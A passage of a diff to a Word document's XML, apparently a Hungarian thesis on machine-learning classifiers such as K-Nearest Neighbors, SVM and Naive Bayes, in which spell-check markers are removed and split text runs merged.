         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear Regression</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11220,21 +10038,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">logisztikai </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>szigmoid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> függvény</w:t>
+        <w:t>logisztikai szigmoid függvény</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11410,45 +10214,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Nearest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Neighbors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>K-Nearest Neighbors</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12004,14 +10771,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A távolság megtalálásának leggyakoribb módja az </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>euklid</w:t>
+        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12023,14 +10783,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>szi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> távolság</w:t>
+        <w:t>szi távolság</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12477,21 +11230,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">n-dimenziós </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>euklidészi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> távolság képlete</w:t>
+        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12530,7 +11269,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="17" w:name="_Toc71471973"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12551,9 +11289,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">ear </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12563,9 +11300,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Support Vector</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12575,9 +11311,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Support</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12587,9 +11322,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12599,9 +11333,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Vector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>LinearSVC</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12611,41 +11344,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>LinearSVC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
@@ -12676,99 +11374,74 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>upport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>z S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">upport </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ector </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>achine</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>V</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(SVM) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>döntési határokat meghatározó döntési síkok koncepcióján alapul.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>achine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(SVM) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>döntési határokat meghatározó döntési síkok koncepcióján alapul.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -12787,7 +11460,6 @@
         </w:rPr>
         <w:t>C</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -12810,21 +11482,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hyperplane</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t xml:space="preserve">(hyperplane) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13670,7 +12328,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Gaussian </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13680,34 +12337,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
+        <w:t>Naive Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="18"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13729,21 +12361,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A Naiv </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
+        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13755,21 +12373,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csoportja, amely a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-tételen alapul</w:t>
+        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13793,21 +12397,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
+        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14255,33 +12845,11 @@
         </w:rPr>
         <w:t xml:space="preserve">s ábra: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tétele</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive Bayes tétele</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14307,45 +12875,65 @@
         </w:rPr>
         <w:t xml:space="preserve">Háromféle </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> osztályozó létezik</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>normál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Gauss-)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> eloszlás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> alapján történő osztályozáshoz a Gauss</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ian</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14357,65 +12945,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>normál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Gauss-)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> eloszlás</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> alapján történő osztályozáshoz a Gauss</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ian</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használják</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bayes-t használják</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14429,33 +12965,17 @@
         </w:rPr>
         <w:t xml:space="preserve">kkor </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tétel</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Naive </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes tétel</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14716,28 +13236,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ensemble</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Methods</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ensemble Methods</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14908,21 +13412,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hiperparaméter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
+        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14977,7 +13467,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14987,9 +13476,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Confusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Confusion </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14999,9 +13487,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>M</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15011,21 +13498,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>atrix</w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15103,7 +13578,6 @@
         </w:rPr>
         <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15114,16 +13588,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">onfusion </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15140,14 +13606,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">trix </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15183,7 +13642,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15196,14 +13654,12 @@
         </w:rPr>
         <w:t>onfusion</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15214,14 +13670,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
